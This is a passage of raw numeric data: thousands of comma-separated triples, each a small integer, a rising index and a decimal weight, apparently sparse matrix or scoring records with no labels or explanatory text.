,(123,21984,0.86331),(117,21984,1.72662),(106,21985,0.98),(106,21986,0.93331),(106,21987,1.02669),(106,21988,0.88669),(106,21989,1.05),(106,21990,5.88),(106,21991,1.14331),(106,21992,1.07331),(106,21993,1.05),(106,21994,1.16669),(106,21995,1.09669),(106,21996,1.07331),(106,21997,0.93331),(106,21998,1.02669),(106,21999,1.96),(106,22000,2.14662),(106,22001,0.91),(106,22002,1.09669),(106,22003,0.23331),(106,22004,1.00331),(106,22005,1.12),(106,22006,0.37331),(106,22007,1.02669),(106,22008,1.19),(106,22009,1.00331),(106,22010,0.98),(106,22011,1.72662),(106,22012,0.95669),(106,22013,1.00331),(106,22014,0.86331),(106,22015,0.98),(106,22016,0.28),(106,22017,1.09669),(106,22018,1.33),(106,22019,0.23331),(106,22020,0.93331),(106,22021,1.02669),(106,22022,0.0175),(113,22022,0.0175),(117,22022,0.0175),(106,22023,0.95669),(106,22024,1.14331),(106,22025,0.14),(113,22025,0.14),(116,22025,0.14),(118,22025,0.14),(117,22025,0.28),(125,22025,0.28),(106,22026,0.86331),(106,22027,1.07331),(106,22028,0.23331),(106,22029,1.00331),(107,22172,0.23331),(107,22173,0.91),(107,22174,1.02669),(107,22175,0.23331),(107,22176,1.07331),(107,22177,1.16669),(107,22178,0.42),(107,22179,1.91338),(107,22180,2.05338),(107,22181,1.11972),(107,22182,1.72662),(107,22183,2.14662),(107,22184,0.98),(107,22185,1.05),(107,22186,1.86662),(107,22187,2.28662),(107,22188,1.68),(107,22189,1.96),(107,22190,1.63338),(107,22191,2.00662),(107,22192,1.86662),(107,22193,2.00662),(107,22199,0.14),(107,22200,0.86331),(107,22201,0.93331),(107,22202,0.28),(107,22203,1.00331),(107,22204,1.12),(107,22410,2.00662),(107,22411,2.33338),(107,22412,1.82),(107,22413,1.12),(107,22414,1.16669),(107,22415,0.65338),(107,22416,1.91338),(107,22417,2.14662),(107,22418,2.00662),(107,22419,2.14662),(107,22420,0.42),(107,22421,1.07331),(107,22422,1.14331),(107,22423,0.37338),(107,22424,1.86662),(107,22425,1.96),(107,22426,0.65338),(107,22427,1.86662),(107,22428,2.19338),(125,22429,0.32669),(107,22429,0.98007),(107,22430,1.91338),(107,22431,2.28662),(107,22432,0.98),(107,22433,1.14331),(107,22434,0.91),(107,22435,0.98),(107,22436,0.37331),(107,22437,0.95669),(107,22438,1.05),(107,22439,0.18662),(107,22440,1.82),(107,22441,2.00662),(118,22442,0.28),(107,22442,0.56),(107,22443,2.1),(107,22444,2.28662),(107,22445,0.42),(107,22446,1.12),(107,22447,1.30669),(107,22914,1.82),(107,22915,2.14662),(126,22916,0.86331),(107,22916,1.72662),(107,22917,2.05338),(107,22918,1.91338),(107,22919,2.24),(107,22920,12.4137),(107,22921,2.00662),(107,22922,1.96),(107,22923,1.96),(107,22924,3.82676),(107,22925,1.91338),(107,22926,2.05338),(107,22927,3.54676),(107,22928,2.00662),(107,22929,2.14662),(107,22930,0.91),(107,22931,1.07331),(111,22932,0.93331),(107,22932,1.86662),(107,22933,2.24),(107,22934,1.86662),(107,22935,2.38),(107,22936,1.72662),(107,22937,1.86662),(107,22938,0.88669),(107,22939,1.02669),(107,22940,1.30676),(107,22941,1.86662),(107,22942,2.19338),(107,22943,1.86662),(107,22944,2.19338),(107,22945,0.74662),(107,22946,2.1),(107,22947,2.28662),(107,22948,0.91),(118,22948,0.91),(107,22949,1.02669),(123,22950,0.93331),(107,22950,1.86662),(107,22951,1.07331),(107,22952,1.14331),(107,22953,1.82),(107,22954,2.00662),(107,22955,0.93331),(107,22956,1.09669),(107,22957,2.1),(107,22958,2.47338),(123,22959,0.37331),(107,22959,0.74662),(107,22960,1.07331),(107,22961,1.19),(107,22962,1.07331),(107,22963,1.19),(107,22964,0.93331),(107,22965,1.05),(107,22966,1.00331),(107,22967,1.14331),(107,22968,1.82),(107,22969,2.05338),(107,22970,1.82),(107,22971,2.14662),(117,22972,0.81669),(118,22972,0.81669),(107,22972,1.63338),(107,22973,1.72662),(107,22974,1.72662),(107,22975,1.02669),(107,22976,0.95669),(134,22977,0.86331),(107,22977,1.72662),(120,22977,1.72662),(123,22977,1.72662),(107,22978,1.91338),(107,22979,1.91338),(107,22980,2.14662),(118,22981,0.84),(107,22981,2.52),(107,22982,1.05),(107,22983,1.82),(107,22984,1.00331),(107,22985,1.16669),(107,22986,0.37331),(113,22986,0.37331),(116,22986,0.37331),(123,22986,0.37331),(107,22987,1.02669),(107,22988,1.26),(107,22989,1.82),(107,22990,2.14662),(107,22991,1.77338),(107,22992,2.00662),(125,23401,1.05),(112,23412,0.23331),(126,23412,0.23331),(128,24042,0.18669),(112,24123,0.32669),(126,24130,0.23331),(113,24164,0.86331),(112,24184,0.46669),(120,24187,0.51331),(109,24367,0.91),(109,24368,0.98),(109,24369,0.86331),(109,24370,1.05),(109,24618,0.98),(109,24619,1.07331),(111,24622,1.58662),(109,24624,0.84),(109,24625,1.02669),(109,24626,1.00331),(109,24627,1.09669),(109,24628,1.77338),(109,24629,1.14331),(109,24630,0.98),(109,24631,1.07331),(111,24632,2.45007),(109,24634,0.88669),(111,24634,0.88669),(120,24634,0.88669),(109,24635,1.02669),(111,24635,1.02669),(120,24635,1.02669),(109,24636,0.84),(109,24637,0.95669),(109,24638,0.46669),(109,24639,1.00331),(109,24640,1.12),(109,24641,0.42),(109,24642,1.02669),(109,24643,1.07331),(109,24644,0.91),(109,24645,1.00331),(109,24646,0.42),(120,24646,0.42),(109,24647,1.09669),(109,24648,1.23669),(109,25003,0.32669),(109,25004,0.98),(109,25005,1.14331),(109,25006,0.46669),(109,25007,1.02669),(109,25008,1.09669),(109,25009,0.51331),(110,25009,0.51331),(121,25009,0.51331),(111,25009,1.02662),(109,25010,1.12),(109,25011,1.28331),(109,25012,0.32669),(109,25013,0.91),(109,25014,1.19),(109,25015,0.14),(111,25015,0.14),(109,25016,0.93331),(109,25017,1.12),(109,25018,0.28),(111,25018,0.28),(109,25019,0.98),(109,25020,1.33),(109,25021,0.14),(111,25021,0.14),(114,25021,0.14),(109,25022,0.84),(109,25023,1.00331),(109,25024,0.23331),(114,25024,0.46662),(109,25025,0.91),(114,25025,0.91),(109,25026,1.21331),(110,25130,0.28),(110,25131,0.14),(110,25132,0.86331),(110,25133,0.98),(110,25134,0.84),(110,25135,0.95669),(110,25136,0.21),(110,25137,0.98),(110,25138,1.16669),(110,26349,1.07331),(110,26350,0.91),(110,26351,1.02669),(110,26352,1.07331),(110,26353,0.93331),(110,26354,0.98),(110,26355,0.93331),(110,26356,0.51331),(110,26357,1.19),(110,26358,1.37669),(110,26359,0.28),(113,26359,0.28),(110,26360,0.91),(110,26361,1.00331),(110,26362,0.93331),(110,26363,1.05),(110,26364,0.32669),(120,26364,0.65338),(110,26365,0.93331),(120,26365,0.93331),(110,26366,1.09669),(110,26367,1.12),(110,26368,1.33),(110,26369,2.00662),(110,26370,1.09669),(110,26371,1.35331),(110,26372,0.51331),(110,26373,1.00331),(110,26374,1.21331),(110,26375,2.23986),(110,26376,4.29324),(110,26377,1.30669),(110,26378,3.84993),(110,26379,0.95669),(110,26380,1.09669),(110,26381,0.95669),(110,26382,1.09669),(110,26383,0.91),(110,26384,1.02669),(110,26385,2.00662),(110,26386,1.09669),(110,26387,1.21331),(110,26388,0.28),(110,26389,0.91),(110,26390,1.14331),(110,26391,0.42),(110,26392,1.12),(110,26393,1.21331),(110,26394,1.07331),(110,26395,1.30669),(110,26396,1.16669),(110,26397,1.35331),(110,26398,1.68),(110,26399,1.05),(110,26400,0.93331),(110,26401,0.32669),(110,26402,0.98),(110,26403,1.26),(110,26404,0.65331),(110,26405,1.09669),(110,26406,1.23669),(110,26407,0.46669),(110,26408,1.00331),(110,26409,1.09669),(110,26410,0.74662),(110,26411,1.91338),(110,26412,2.1),(110,26413,1.63317),(110,26414,0.88669),(110,26415,1.05),(110,26416,0.88669),(110,26417,0.98),(110,26418,3.64),(110,26419,1.09669),(110,26420,1.12),(110,26421,1.09669),(110,26422,1.19),(110,26423,0.93331),(110,26424,1.21331),(110,26425,1.86655),(110,26426,1.09669),(110,26427,1.23669),(110,26428,2.87007),(110,26429,1.21331),(110,26430,1.23669),(110,26431,1.16669),(110,26432,0.98),(110,26433,1.16669),(110,26434,0.28),(110,26435,0.93331),(110,26436,1.14331),(110,26437,0.28),(110,26438,1.12),(110,26439,1.35331),(110,26440,1.11993),(110,26441,2.87007),(110,26442,3.08007),(110,26443,0.65338),(110,26444,1.12),(110,26445,1.21331),(110,26446,0.93331),(110,26447,1.12),(110,26448,0.84),(110,26449,0.95669),(110,26450,1.07331),(110,26451,1.02669),(110,26452,1.35331),(110,26453,3.7331),(110,26454,1.02669),(110,26455,1.12),(110,26456,1.96),(110,26457,1.14331),(110,26458,1.16669),(110,26459,1.05),(110,26460,1.33),(110,26461,1.16669),(110,26462,1.28331),(110,26463,0.98),(110,26464,1.28331),(110,26465,0.95669),(110,26466,1.02669),(110,26467,0.98),(110,26468,1.09669),(110,26469,1.00331),(110,26470,1.07331),(110,26471,1.00331),(110,26472,1.19),(110,26473,4.24697),(110,26474,1.05),(110,26475,1.12),(110,26476,0.95669),(110,26477,1.05),(110,26478,1.02669),(110,26479,1.19),(110,26480,0.93331),(110,26481,1.07331),(110,26482,1.02669),(110,26483,1.12),(110,26484,0.93331),(110,26485,1.02669),(110,26486,1.09669),(110,26487,1.16669),(110,26488,2.00662),(110,26489,1.23669),(110,26490,1.26),(110,26491,0.93331),(110,26492,1.12),(110,26493,3.21993),(110,26494,1.14331),(110,26495,2.47338),(110,26496,0.88669),(110,26497,1.12),(110,26498,1.09669),(110,26499,1.05),(110,26500,1.02669),(110,26501,1.26),(110,26502,0.98),(110,26503,1.16669),(110,26504,1.05),(110,26505,1.21331),(110,26506,0.86331),(110,26507,0.93331),(110,26508,2.05338),(110,26509,1.16669),(110,26510,1.37669),(110,26511,1.05),(110,26512,1.16669),(110,26513,0.88669),(110,26514,0.95669),(110,26515,0.91),(110,26516,1.16669),(110,26517,1.00331),(110,26518,1.07331),(110,26519,1.07331),(110,26520,1.21331),(110,26521,0.65331),(110,26522,1.28331),(110,26523,1.4),(110,26524,0.23331),(110,26525,0.88669),(110,26526,1.07331),(110,26527,0.23331),(110,26528,1.07331),(110,26529,1.02669),(110,26530,1.12),(110,26531,0.28),(110,26532,1.00331),(110,26533,1.16669),(110,26534,0.86331),(110,26535,0.95669),(110,26536,0.28),(110,26537,1.07331),(110,26538,1.28331),(110,26539,0.98),(110,26540,1.16669),(110,26541,0.28),(110,26542,1.09669),(110,26543,1.19),(110,26544,1.02669),(110,26545,1.21331),(110,26546,0.37331),(110,26547,0.98),(110,26548,1.16669),(110,26549,0.32669),(113,26549,0.32669),(120,26549,0.32669),(126,26549,0.32669),(110,26550,0.93331),(110,26551,1.05),(110,26552,0.84),(110,26553,0.93331),(110,26554,1.12),(110,26555,1.96),(110,26556,1.23669),(110,26557,1.23669),(110,26558,0.42),(110,26559,1.02669),(110,26560,1.21331),(110,26561,0.42),(110,26562,1.12),(110,26563,1.19),(110,26564,1.07331),(110,26565,1.30669),(110,26566,0.32669),(110,26567,1.00331),(110,26568,1.07331),(110,26569,0.32669),(110,26570,0.95669),(110,26571,1.09669),(126,26572,0.37331),(110,26572,0.74662),(110,26573,0.98),(110,26574,1.28331),(110,26575,1.02669),(110,26576,1.21331),(110,26577,3.59359),(110,26578,2.1),(110,26579,1.26),(110,26580,1.12),(110,26581,4.9),(110,26582,4.48),(110,26583,1.26),(110,26584,0.93331),(110,26585,0.98),(110,26586,0.93331),(110,26587,1.14331),(110,26588,1.05),(110,26589,1.35331),(110,26590,1.12),(110,26591,1.33),(110,26592,0.28),(110,26593,0.95669),(110,26594,1.05),(110,28807,0.91),(110,28808,0.98),(110,28809,1.02669),(110,28810,1.14331),(110,28811,0.84),(110,28812,0.98),(110,28813,1.12),(110,28814,1.02669),(110,28815,1.12),(110,28816,0.18669),(110,28817,0.88669),(110,28818,0.98),(110,28819,0.28),(110,28820,0.88669),(110,28821,0.98),(110,28822,0.93331),(110,28823,1.21331),(110,28824,0.23331),(110,28825,0.88669),(110,28826,0.98),(110,28827,1.05),(110,28828,1.30669),(110,28829,1.07331),(110,28830,1.14331),(110,28831,0.46669),(110,28832,1.02669),(110,28833,1.23669),(110,28834,0.42),(110,28835,1.00331),(110,28836,1.28331),(110,28837,0.51331),(110,28838,1.12),(110,28839,1.19),(110,28840,0.46662),(110,28841,0.91),(110,28842,1.16669),(110,28843,0.93331),(110,28844,1.02669),(110,28845,0.51331),(110,28846,1.19),(110,28847,1.28331),(110,28848,0.42),(110,28849,0.98),(110,28850,1.21331),(110,28851,0.42),(110,28852,1.09669),(110,28853,1.16669),(110,28854,0.42),(110,28855,0.98),(110,28856,1.19),(110,28857,0.32669),(110,28858,1.07331),(110,28859,1.37669),(110,28860,0.86331),(110,28861,1.07331),(110,28862,0.91),(110,28863,0.95669),(110,28864,0.88669),(117,28864,0.88669),(110,28865,1.19),(110,28866,0.88669),(110,28867,1.12),(110,28868,0.88669),(110,28869,1.00331),(110,28870,0.98),(110,28871,1.07331),(110,28872,0.93331),(110,28873,1.02669),(110,28874,1.07331),(110,28875,1.05),(110,28876,0.88669),(110,28877,1.02669),(110,28878,3.92),(110,28879,1.07331),(110,28880,2.38),(110,28881,1.19),(110,28882,1.02669),(110,28883,1.19),(110,28884,0.98),(110,28885,0.93331),(113,28885,1.86662),(110,28886,1.05),(110,28887,0.95669),(110,28888,1.12),(110,28889,3.00993),(110,28890,1.09669),(110,28891,1.19),(110,28892,1.16669),(110,28893,1.00331),(110,28894,1.16669),(110,28895,0.86331),(110,28896,0.93331),(110,28897,1.96),(110,28898,2.33338),(110,28899,0.93331),(123,28899,0.93331),(110,28900,1.00331),(110,28901,1.05),(110,28902,1.23669),(110,28903,1.00331),(110,28904,1.07331),(110,28905,1.02669),(110,28906,1.09669),(110,28907,1.07331),(110,28908,0.88669),(110,28909,0.95669),(110,28910,1.02669),(116,28910,1.02669),(110,28911,1.12),(110,28912,3.21993),(110,28913,3.42993),(110,28914,2.87007),(110,28915,1.16669),(110,28916,2.05338),(110,28917,2.94),(110,28918,1.05),(110,28919,2.1),(110,28920,0.93331),(110,28921,1.00331),(110,28922,0.88669),(110,28923,0.98),(110,28924,1.05),(110,28925,1.28331),(110,28926,0.95669),(110,28927,1.02669),(110,28928,3.92),(110,28929,1.07331),(110,28930,1.02669),(110,28931,1.05),(110,28932,1.05),(110,28933,0.98),(110,28934,1.05),(110,28935,0.93331),(110,28936,1.72662),(110,28937,1.86662),(110,28938,0.95669),(110,28939,1.21331),(110,28940,1.00331),(110,28941,1.12),(110,28942,0.95669),(110,28943,1.02669),(110,28944,2.73),(110,28945,0.95669),(110,28946,1.12),(110,28947,1.09669),(110,28948,1.00331),(110,28949,1.12),(110,28950,0.93331),(110,28951,1.05),(110,28952,0.98),(110,28953,1.19),(110,28954,0.88669),(110,28955,1.14331),(110,28956,0.88669),(110,28957,1.02669),(110,28958,1.82),(110,28959,1.96),(110,28960,0.91),(110,28961,0.98),(110,28962,0.91),(110,28963,0.98),(110,28964,1.00331),(110,28965,1.16669),(110,28966,1.05),(110,28967,1.21331),(110,28968,1.00331),(110,28969,1.07331),(110,28970,0.98),(110,28971,1.21331),(110,28972,1.77338),(110,28973,1.91338),(110,28974,0.91),(110,28975,1.00331),(110,28976,0.93331),(110,28977,1.09669),(110,28978,0.91),(110,28979,0.98),(110,28980,0.98),(110,28981,1.05),(110,28982,0.86331),(110,28983,1.05),(110,28984,1.02669),(110,28985,1.33),(110,28986,0.86331),(110,28987,1.00331),(110,28988,0.93331),(110,28989,0.98),(110,28990,1.07331),(110,28991,1.23669),(110,28992,1.96),(110,28993,2.24),(110,28994,1.00331),(110,28995,1.07331),(110,28996,0.88669),(110,28997,0.95669),(110,28998,0.98),(110,28999,1.14331),(110,29000,10.92),(110,29001,1.00331),(110,29002,1.07331),(110,29003,1.14331),(110,29004,0.98),(110,29005,0.95669),(110,29006,1.00331),(110,29007,0.98),(110,29008,1.07331),(110,29009,1.05),(110,29010,1.28331),(110,29011,1.07331),(110,29012,1.00331),(110,29013,2.00662),(110,29014,2.33338),(110,29015,0.98),(110,29016,1.05),(110,29017,1.05),(110,29018,1.12),(110,29019,0.93331),(110,29020,1.16669),(110,29021,0.93331),(110,29022,0.98),(110,29023,0.98),(110,29024,0.93331),(110,29025,1.02669),(110,29026,0.91),(110,29027,1.07331),(110,29028,1.05),(110,29029,1.12),(110,29030,0.98),(110,29031,1.16669),(110,29032,0.88669),(110,29033,1.00331),(110,29034,0.88669),(110,29035,0.93331),(110,29036,0.95669),(110,29037,1.19),(110,29038,3.15),(110,29039,0.95669),(110,29040,1.12),(110,29041,10.5),(110,29042,2.28662),(110,29043,1.26),(110,29044,1.26),(110,29045,2.24),(110,29046,1.28331),(110,29047,1.28331),(110,29048,1.23669),(110,29049,1.16669),(110,29050,0.86331),(117,29050,0.86331),(110,29051,1.14331),(110,29052,6.53317),(110,29053,1.16669),(110,29054,1.02669),(110,29055,0.98),(110,29056,1.07331),(110,29057,1.00331),(110,29058,1.05),(110,29059,1.09669),(110,29060,0.98),(110,29061,1.33),(110,29062,2.14662),(110,29063,1.23669),(110,29064,1.26),(110,29065,0.91),(110,29066,0.98),(110,29067,0.93331),(110,29068,1.05),(110,29069,0.91),(110,29070,1.05),(110,29071,1.19),(110,29072,1.35331),(112,29073,0.02919),(116,29073,0.02919),(120,29073,0.02919),(113,29073,0.05838),(110,29073,0.08757),(110,29074,3.08007),(110,29075,3.50007),(110,29076,0.88669),(112,29076,0.88669),(118,29076,0.88669),(110,29077,1.09669),(110,29078,0.91),(110,29079,1.07331),(110,29080,0.88669),(110,29081,1.19),(110,29082,0.93331),(110,29083,1.16669),(110,29084,0.91),(110,29085,1.02669),(110,29086,1.00331),(110,29087,1.14331),(110,29088,0.95669),(110,29089,1.14331),(110,29090,1.02669),(110,29091,1.09669),(110,29092,3.21993),(110,29093,1.28331),(110,29094,1.14331),(110,29095,1.30669),(110,29096,0.46669),(113,29096,0.46669),(110,29097,1.09669),(110,29098,1.28331),(110,29099,0.91),(118,29099,0.91),(110,29100,1.02669),(110,29101,0.18669),(117,29101,0.18669),(110,29102,0.86331),(110,29103,0.95669),(110,29104,0.98),(110,29105,1.09669),(110,29106,0.95669),(110,29107,1.16669),(110,29108,0.91),(110,29109,1.00331),(110,29110,0.86331),(110,29111,0.93331),(110,29112,0.88669),(110,29113,1.07331),(110,29114,5.04),(110,29115,1.86662),(110,29116,1.00331),(110,29117,1.09669),(110,29118,0.98),(110,29119,0.98),(110,29120,1.77338),(110,29121,0.98),(110,29122,0.98),(110,29123,0.93331),(116,29123,0.93331),(110,29124,0.88669),(110,29125,0.95669),(110,29126,0.95669),(110,29127,1.02669),(110,29128,1.07331),(110,29129,1.07331),(110,29130,1.02669),(110,29131,0.91),(110,29132,1.14331),(110,29133,0.91),(110,29134,1.02669),(110,29135,1.02669),(110,29136,1.21331),(110,29137,1.00331),(110,29138,1.19),(110,29139,0.93331),(117,29139,0.93331),(110,29140,5.32014),(110,29141,0.95669),(110,29142,3.92),(110,29143,1.00331),(110,29144,1.91338),(110,29145,1.02669),(110,29146,1.07331),(110,29147,0.93331),(110,29148,1.02669),(110,29149,0.88669),(110,29150,0.95669),(110,29151,0.93331),(110,29152,1.19),(120,29153,0.93331),(110,29153,1.86662),(123,29153,1.86662),(110,29154,1.02669),(110,29155,1.07331),(110,29156,0.86331),(110,29157,0.98),(110,29158,0.95669),(110,29159,1.05),(110,29160,0.91),(110,29161,1.09669),(110,29162,1.68),(110,29163,0.88669),(110,29164,1.02669),(110,29165,0.81669),(110,29166,1.05),(110,29167,0.93331),(110,29168,1.00331),(110,29169,0.98),(110,29170,1.14331),(110,29171,1.02669),(110,29172,1.12),(110,29173,0.93331),(110,29174,1.07331),(110,29175,0.91),(110,29176,1.00331),(110,29177,0.93331),(110,29178,0.98),(110,29179,2.79993),(110,29180,1.02669),(110,29181,1.12),(110,29182,1.02669),(110,29183,0.93331),(110,29184,1.12),(110,29185,1.05),(110,29186,1.19),(110,29187,0.88669),(110,29188,1.07331),(110,29189,0.91),(110,29190,1.09669),(110,29191,1.02669),(110,29192,2.1),(110,29193,1.05),(110,29194,1.00331),(110,29195,0.95669),(110,29196,1.09669),(110,29197,1.00331),(110,29198,0.91),(110,29199,1.19),(110,29200,0.93331),(110,29201,1.00331),(110,29202,1.86662),(110,29203,0.86331),(110,29204,0.95669),(110,29205,0.18669),(119,29205,0.56007),(110,29206,0.86331),(110,29207,1.07331),(110,29208,0.23331),(126,29208,0.23331),(110,29209,0.88669),(126,29209,0.88669),(110,29210,0.98),(110,29211,1.82),(110,29212,1.96),(110,29213,0.42),(110,29214,0.98),(110,29215,1.14331),(110,29216,0.42),(110,29217,1.09669),(110,29218,1.19),(110,29219,1.12),(110,29220,1.28331),(110,29221,0.32669),(126,29221,0.32669),(110,29222,0.93331),(110,29223,1.05),(110,29224,0.88669),(110,29225,0.95669),(110,29226,0.09331),(112,29226,0.09331),(126,29226,0.09331),(110,29227,0.84),(110,29228,1.05),(110,29229,0.81669),(110,29230,0.91),(111,29604,0.93331),(111,29605,1.00331),(111,29606,0.93331),(111,29607,1.00331),(111,29612,3.73324),(111,29613,1.00331),(111,29614,1.00331),(111,29615,1.14331),(111,29616,1.07331),(111,29617,0.14),(118,29617,0.14),(126,29617,0.14),(111,29618,0.86331),(111,29619,0.93331),(111,30336,0.81669),(111,30337,0.98),(111,30338,0.84),(111,30339,0.98),(111,30340,0.86331),(111,30341,0.93331),(111,30346,1.00331),(111,30347,1.21331),(111,30348,1.63338),(111,30350,1.02669),(111,30353,0.86331),(111,30354,1.07331),(111,30359,1.58662),(111,30360,0.91),(111,30361,0.98),(111,30370,0.86331),(111,30371,0.95669),(111,30373,1.86662),(111,30378,1.09669),(111,30379,0.95669),(111,30380,1.05),(111,30381,0.86331),(111,30382,1.16669),(111,30383,0.81669),(111,30384,0.98),(111,30387,0.77),(111,30388,0.95669),(111,30389,1.02669),(111,30390,1.21331),(111,30397,0.88669),(111,30398,0.95669),(111,30399,0.88669),(111,30400,0.95669),(111,30401,0.88669),(111,30402,1.12),(111,30403,0.79331),(111,30404,0.93331),(111,30407,0.84),(111,30408,1.05),(111,30414,0.88669),(111,30415,1.05),(111,30416,0.81669),(111,30417,1.09669),(111,30422,0.93331),(111,30423,1.23669),(111,30424,0.88669),(111,30425,1.02669),(111,30426,0.86331),(111,30427,0.98),(111,30428,0.95669),(111,30429,1.05),(111,30430,0.93331),(111,30431,1.09669),(111,30432,0.84),(111,30433,0.95669),(111,30434,0.42),(111,30435,1.07331),(111,30436,1.19),(111,30437,0.79331),(111,30438,0.88669),(111,30439,0.84),(111,30440,1.02669),(111,30441,0.42),(111,30442,0.95669),(111,30443,1.23669),(111,30444,0.37331),(111,30445,0.95669),(111,30446,1.09669),(111,30447,0.46662),(111,30448,0.86331),(111,30449,0.91),(111,30450,0.98),(111,30451,1.07331),(111,30452,0.28),(111,30453,1.12),(111,30454,1.30669),(111,30455,0.42),(111,30456,0.95669),(111,30457,1.05),(111,30458,0.32669),(111,30459,1.02669),(111,30460,1.09669),(111,30461,0.37331),(111,30462,0.95669),(111,30463,1.19),(111,30464,0.56),(111,30465,0.91),(111,30466,1.07331),(111,30467,0.93331),(111,30468,1.14331),(111,30469,0.42),(111,30470,1.00331),(111,30471,1.19),(111,30472,0.46669),(111,30473,1.02669),(111,30474,1.07331),(111,30475,0.56),(111,30476,1.05),(111,30477,1.19),(111,30478,1.00331),(111,30479,1.12),(111,30480,0.14),(111,30481,0.95669),(111,30482,1.09669),(111,30483,0.32669),(111,30484,1.00331),(111,30485,1.23669),(111,30486,1.02669),(111,30487,1.09669),(111,30488,1.00331),(111,30489,1.16669),(111,30490,0.91),(111,30491,1.12),(111,30492,0.88669),(111,30493,1.07331),(111,30494,0.37331),(111,30495,1.09669),(111,30496,1.19),(111,30497,0.23331),(128,30497,0.23331),(111,30498,1.02669),(111,30499,1.12),(111,31891,0.37331),(111,31892,1.12),(111,31893,1.30669),(111,31894,0.28),(111,31895,1.00331),(111,31896,1.07331),(111,31897,0.23331),(111,31898,1.09669),(111,31899,1.19),(111,31900,0.23331),(111,31901,0.88669),(111,31902,1.05),(111,31903,0.46669),(111,31904,1.02669),(111,31905,1.16669),(111,31906,0.32669),(111,31907,0.93331),(111,31908,1.07331),(111,31909,0.23331),(111,31910,0.88669),(111,31911,1.02669),(111,31912,0.93331),(111,31913,0.98),(111,31914,0.95669),(111,31915,1.05),(111,31916,0.98),(111,31917,1.05),(111,31918,1.12),(111,31919,1.14331),(111,31920,1.35331),(111,31921,1.4),(111,31922,1.4),(111,31923,0.7),(111,31924,1.26),(111,31925,1.4),(111,31926,0.7),(111,31927,1.16669),(111,31928,1.4),(111,31929,0.60669),(111,31930,1.23669),(111,31931,1.37669),(111,31932,0.42),(111,31933,0.95669),(111,31934,1.00331),(111,31935,0.46669),(113,31935,0.46669),(118,31935,0.46669),(111,31936,1.21331),(111,31937,1.28331),(111,31938,0.28),(111,31939,1.00331),(111,31940,1.30669),(111,31941,0.32669),(111,31942,1.00331),(111,31943,1.16669),(111,31944,1.49324),(111,31945,1.07331),(111,31946,1.4),(111,31947,0.93331),(111,31948,1.00331),(111,31949,0.98),(111,31950,1.23669),(111,31951,1.07331),(111,31952,1.21331),(111,31953,0.18669),(111,31954,0.86331),(111,31955,1.02669),(111,31956,0.46669),(111,31957,1.00331),(111,31958,1.09669),(111,31959,2.58993),(111,31960,0.93331),(111,31961,1.02669),(111,31962,1.00331),(111,31963,0.98),(111,31964,1.16669),(111,31965,0.91),(111,31966,1.05),(111,31967,0.84),(111,31968,1.00331),(111,31969,1.05),(111,31970,0.98),(111,31971,1.14331),(111,31972,0.91),(111,31973,1.09669),(111,31974,1.09669),(111,31975,1.19),(111,31976,0.91),(111,31977,1.09669),(111,31978,0.88669),(111,31979,1.23669),(111,31980,0.32669),(111,31981,1.00331),(111,31982,1.12),(111,31983,0.32669),(111,31984,0.93331),(111,31985,1.26),(111,31986,0.23331),(111,31987,0.88669),(111,31988,1.00331),(111,31989,0.23331),(114,31989,0.23331),(121,31989,0.23331),(111,31990,0.88669),(111,31991,1.02669),(111,31992,0.23331),(114,31992,0.46662),(111,31993,0.86331),(111,31994,1.02669),(112,32555,0.91),(112,32556,0.98),(112,32557,0.28),(112,32558,1.02669),(112,32559,1.12),(112,32560,0.18669),(119,32560,0.18669),(112,32561,0.93331),(112,32562,1.09669),(112,32563,1.12014),(112,32564,1.02669),(112,32565,1.12),(112,32566,1.91338),(112,32567,1.14331),(112,32568,1.05),(112,32569,0.88669),(112,32570,1.14331),(112,32571,0.93331),(112,32572,1.05),(112,32573,0.95669),(112,32574,1.07331),(112,32575,1.07331),(112,32576,1.14331),(112,32577,1.02669),(112,32578,1.00331),(112,32579,1.21331),(112,32580,0.91),(112,32581,0.98),(112,32582,0.42),(112,32583,1.00331),(112,32584,1.07331),(112,32585,0.32669),(125,32585,0.32669),(112,32586,0.98),(112,32587,1.09669),(112,32588,1.09669),(112,32589,1.26),(112,32590,0.51331),(112,32591,1.12),(112,32592,1.19),(112,32593,0.93331),(112,32594,1.05),(112,32595,0.42),(119,32595,0.42),(112,32596,1.16669),(112,32597,1.28331),(112,33215,1.91338),(112,33216,1.02669),(112,33217,1.07331),(112,33218,0.95669),(112,33219,1.14331),(112,33220,0.86331),(112,33221,0.98),(112,33222,0.37331),(112,33223,0.98),(112,33224,1.12),(112,33225,0.95669),(112,33226,0.91),(112,33227,1.00331),(112,33228,1.00331),(112,33229,1.09669),(112,33230,0.88669),(112,33231,0.98),(112,33232,1.02669),(112,33233,1.12),(112,33234,0.95669),(112,33235,1.05),(112,33236,0.88669),(112,33237,1.00331),(112,33238,1.02669),(112,33239,1.14331),(112,33240,1.77338),(112,33241,2.00662),(112,33242,0.91),(112,33243,1.00331),(112,33244,0.93331),(112,33245,1.02669),(112,33246,1.05),(112,33247,1.16669),(112,33248,0.95669),(117,33248,0.95669),(112,33249,1.05),(112,33250,0.88669),(112,33251,1.02669),(112,33252,1.00331),(112,33253,0.86331),(112,33254,1.02669),(112,33255,0.98),(112,33256,1.07331),(112,33257,0.88669),(112,33258,1.09669),(112,33259,1.02669),(112,33260,0.91),(112,33261,1.05),(112,33262,0.86331),(112,33263,0.95669),(112,33264,1.77338),(112,33265,0.98),(112,33266,0.95669),(112,33267,0.88669),(112,33268,0.95669),(112,33269,0.88669),(112,33270,0.95669),(112,33271,1.16669),(112,33272,0.95669),(112,33273,1.05),(112,33274,0.88669),(112,33275,1.12),(112,33276,0.86331),(112,33277,1.00331),(112,33278,0.32669),(112,33279,0.98),(112,33280,1.07331),(112,33281,0.86331),(112,33282,1.05),(112,33283,0.98),(112,33284,1.07331),(112,33285,1.00331),(112,33286,0.86331),(112,33287,0.93331),(112,33288,0.88669),(112,33289,1.12),(112,33290,0.95669),(112,33291,1.07331),(112,33292,0.93331),(112,33293,1.00331),(112,33294,1.05),(112,33295,1.19),(112,33296,1.02669),(112,33297,1.19),(112,33298,0.93331),(112,33299,1.00331),(112,33300,0.93331),(112,33301,1.00331),(112,33302,0.95669),(118,33302,0.95669),(123,33302,0.95669),(112,33303,0.91),(112,33304,1.00331),(112,33305,0.91),(112,33306,0.98),(112,33307,0.93331),(112,33308,1.02669),(112,33309,1.82),(112,33310,1.09669),(112,33311,1.12),(112,33312,1.07331),(112,33313,1.19),(112,33314,0.93331),(112,33315,1.05),(112,33316,0.91),(112,33317,1.07331),(112,33318,0.18669),(112,33319,0.86331),(112,33320,1.05),(112,33321,0.93331),(112,33322,1.07331)